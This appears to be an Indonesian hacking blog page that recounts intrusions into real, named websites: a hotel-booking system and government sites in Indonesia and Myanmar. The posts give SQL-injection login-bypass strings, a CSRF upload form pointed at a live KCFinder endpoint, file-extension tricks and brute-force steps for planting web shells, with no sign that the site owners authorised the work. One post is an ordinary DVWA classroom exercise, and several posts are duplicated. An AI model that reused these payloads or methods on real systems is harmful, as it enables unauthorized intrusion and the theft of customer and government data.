Tampilkan postingan dengan label Pentest. Tampilkan semua postingan
Sabtu, 30 Januari 2016
Management Hotel Hacked
Halo agan, kali ini saya menemukan salah satu bug pada website Management Hotel. Websitenya masih saya rahasiakan, dikarenakan belum di patch sama adminnya.
Saya dapat melihat informasi rahasia para user. Seperti Kartu Kredit, No HP, Email, dll
Saya juga dapat me accept pesanan bookingan hotel .
Ada berbagai perusahaan disini
Sebelumnya, saya untuk memasuki sistem mereka menggunakan BruteForce. yaitu memasukan berbagai kata.
Bug ini terbilang berbahaya, dikarenakan dapat meraup uang dari para client.
Saya tidak mengambil uang sepersen pun dari para client!
Rabu, 19 Agustus 2015
Penetration Testing SubDomain ekon.go.id
Assalamualaikum , kali ini saya akan memposting tentang kelemahan pada SubDomain Kementerian Koordinator Bidang Perekonomian Republik Indonesia .
Vulnerable Type : Bypass Admin Login & Tamper Data
SubDomain : http://pkln.ekon.go.id
Pertama tama login menggunakan Bypass Admin Login yang saya pakai :
user id : ' or 1=1 or ''='
password : ' or 1=1 or ''='
berhasil . tara ..
disitu ada bacaan upload . wah kesempatan nih ..
lanjut kita beraksi .
kita memulai Tamper Data , saya gunakan Mozilla Firefox .
jangan terlalu serius . hahaha .
klik Tools > Tamper Data .
saya rename script saya dengan ekstensi : file.htm.pdf ( karna disitu disebut hanya upload file dokumen pdf )
ok lanjut ..
wah wah . jangan terlalu serius . inget waktu !
klik tamper ..
kita copy dari form box yg kotak gede , ke notepad . dan kita cari file.htm.pdf ubah jadi file.htm
klik tamper deh . sukses , wota .
terima kasih atas kunjungannya . jangan lupa share blog saya ya . biar tambah semangat post nya ..
Vulnerable Type : Bypass Admin Login & Tamper Data
SubDomain : http://pkln.ekon.go.id
Pertama tama login menggunakan Bypass Admin Login yang saya pakai :
user id : ' or 1=1 or ''='
password : ' or 1=1 or ''='
berhasil . tara ..
disitu ada bacaan upload . wah kesempatan nih ..
lanjut kita beraksi .
kita memulai Tamper Data , saya gunakan Mozilla Firefox .
jangan terlalu serius . hahaha .
klik Tools > Tamper Data .
saya rename script saya dengan ekstensi : file.htm.pdf ( karna disitu disebut hanya upload file dokumen pdf )
ok lanjut ..
wah wah . jangan terlalu serius . inget waktu !
klik tamper ..
kita copy dari form box yg kotak gede , ke notepad . dan kita cari file.htm.pdf ubah jadi file.htm
klik tamper deh . sukses , wota .
terima kasih atas kunjungannya . jangan lupa share blog saya ya . biar tambah semangat post nya ..
Rabu, 29 Juli 2015
Penetration Testing Website bbia.go.id
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Balai Besar Industri Agro Indonesia , Lansung saja ke TKP !
Vulnerable Type : CSRF KCFinder File Upload
Can upload file : .php5 | php.pjpeg
Step satu kita cari kelemahan pada web tersebut dengan melakukan dorking .
saya menemukan kcfinder file ? ya . disitu saya inget bahwa ckfinder mempunyai kelemahan .
saya coba upload.php dan ternyata error ? tidak
saya coba akali dan saya teringat pada csrf .
ok ini code csrf nya :
upload file , dan berhasil /^_^
sekian dan terimakasih ..
Vulnerable Type : CSRF KCFinder File Upload
Can upload file : .php5 | php.pjpeg
Step satu kita cari kelemahan pada web tersebut dengan melakukan dorking .
saya menemukan kcfinder file ? ya . disitu saya inget bahwa ckfinder mempunyai kelemahan .
saya coba upload.php dan ternyata error ? tidak
saya coba akali dan saya teringat pada csrf .
ok ini code csrf nya :
<title>CSRF Upload</title>
<form enctype="multipart/form-data"
action="http://bbia.go.id/bbia/admin/ckeditor/kcfinder/upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
upload file , dan berhasil /^_^
sekian dan terimakasih ..
Rabu, 10 Juni 2015
Penetration Testing Website pertanian.go.id
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Kementrian Pertanian . Lansung saja ke TKP :
Vulnerable type: Upload File & Bypass Admin SQL Injection
Step satu , kita cari kelemahan pada http://pertanian.go.id/ , ternyata saya tidak menemukan kelemahan pada website tersebut .
Step ke dua , saya coba cari kelemahan nya dengan Google Dork .
Saya menemukan dir yang ada cara untuk Melapor .
Pada foto diatas , ada tata cara melapor . saya mengikuti tutorial tersebut .
Register terlebih dahulu .
Kemudian saya ke form login , memasukan user dan password yang tadi saya pakai untuk register
Dikarenakan saya tidak mengetahui kemana file yang tadi saya upload , saya mencoba mencari admin panel pada dir tersebut dengan Havij .
saya berhasil menemukan admin panel website tersebut .
sekarang saya mencoba memasukan user dan password yang tadi saya register . dan ternyata tidak bisa .
sekarang saya mencoba melakukan metode yang sebelumnya saya gunakan pada website Pertambangan Myanmar
Yaitu metode DVWA brute force authentication Attack dengan Burp Suite
dan ternyata berhasil masuk :D
kemudian saya klik Download , dan ternyata bukan mendownload , melainkan menampilkan shell kita .
Sekian tutorial dari kami Zer0Security Crew . apabila ada yang dipertanyakan silahkan komentar atau bisa kirim pesan ke xGame1945@gmail.com
Vulnerable type: Upload File & Bypass Admin SQL Injection
Step satu , kita cari kelemahan pada http://pertanian.go.id/ , ternyata saya tidak menemukan kelemahan pada website tersebut .
Step ke dua , saya coba cari kelemahan nya dengan Google Dork .
Saya menemukan dir yang ada cara untuk Melapor .
Pada foto diatas , ada tata cara melapor . saya mengikuti tutorial tersebut .
Register terlebih dahulu .
Kemudian saya ke form login , memasukan user dan password yang tadi saya pakai untuk register
Dikarenakan saya tidak mengetahui kemana file yang tadi saya upload , saya mencoba mencari admin panel pada dir tersebut dengan Havij .
saya berhasil menemukan admin panel website tersebut .
sekarang saya mencoba memasukan user dan password yang tadi saya register . dan ternyata tidak bisa .
sekarang saya mencoba melakukan metode yang sebelumnya saya gunakan pada website Pertambangan Myanmar
Yaitu metode DVWA brute force authentication Attack dengan Burp Suite
dan ternyata berhasil masuk :D
kemudian saya klik Download , dan ternyata bukan mendownload , melainkan menampilkan shell kita .
Sekian tutorial dari kami Zer0Security Crew . apabila ada yang dipertanyakan silahkan komentar atau bisa kirim pesan ke xGame1945@gmail.com
Kamis, 04 Juni 2015
Latihan keamanan website !
Kepada para peserta mata kuliah keamanan jaringan, hari ini kita akan belajar tentang Web Security. Untuk latihan keamanan web, kita akan menggunakan tools DVWA (Damn Vulnerable Web Application). DVWA merupakan sebuah website yang sudah dirancang sedemikian rupa sehingga memiliki banyak celah keamanan. DVWA ini nantinya yang akan kita jadikan target latihan untuk mempelajari keamanan Web. Untuk itu hari ini kalian diminta untuk melakukan instalasi dan konfigurasi DVWA :
- DVWA memerlukan XAMPP. Bila kalian belum menginstall XAMPP silahkan unduh dari link berikut https://www.apachefriends.org/index.html . Kemudian Install XAMPP pada Windows anda. Pastikan folder XAMPP terletak di direktori C
- Unduh DVWA dari link berikut : http://www.dvwa.co.uk/
- unzip file DVWA dan letakkan di folder htdocs (C:/xampp/htdocs )
- Jalankan XAMPP! Jalankan file xampp-control. Kemudian klik tombol start pada opsi Apache dan MySQL.
- Jalankan browser dan buka halaman http://localhost/dvwa/index.php. Jika tampil error database, abaikan dulu. Yang terpenting adalah DVWA telah dapat diakses dari browser.
- Pengaturan DVWA. Masukan URL http://localhost/dvwa/setup.php. Kemudian klik tombol Create / Reset Database.
- Bila sudah berhasil create Database, maka buka alamat http://localhost/dvwa Silahkan login dengan Default username : admin ; Default password : password
- Bila terjadi error, lakukan modifikasi pada file config.inc.php , edit bagian berikut:
- $_DVWA[ ‘db_password’ ] = ‘p@ssw0rd'; kosongkan passwordnya ” sehingga database berhasil dibuat
- Konfigurasi DVWA : set security level – low
Setelah konfigurasi selesai silahkan kerjakan latihan keamanan web berikut:
Lakukan SQL Injection di DVWA: coba 5 script injection yang berbeda.
Lakukan Cross Site-Scripting (XSS-Attack)
Laporkan hasilnya!
Jelaskan apa yang dimaksud dengan OWASP top 10
Have Fun!
Senin, 01 Juni 2015
Penetration Testing Website www.mining.gov.mm
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Pertambangan Myanmar . Lansung saja ke TKP :
Vulnerable type: MS SQL injection
Step ke satu , saya menemukan halaman admin website dengan menggunakan Havij .
Step ke dua , kita gunakan cara DVWA brute force authentication Attack dengan Burp Suite .
Vulnerable type: MS SQL injection
Step ke satu , saya menemukan halaman admin website dengan menggunakan Havij .
atau saya menggunakan pencarian google untuk mencari Exploit kepada web tsb ..
saya mencoba memasukan =
username : administrator') or ('1'='1
password : administrator') or ('1'='1
wow , dan ternyata saya berhasil memasuki kedalam admin panel website tsb ..
saya mencoba menupload shell asp, ...
dan ternyata berhasil :D
Sekian dan terimakasih ...
Langganan:
Postingan
(
Atom
)





























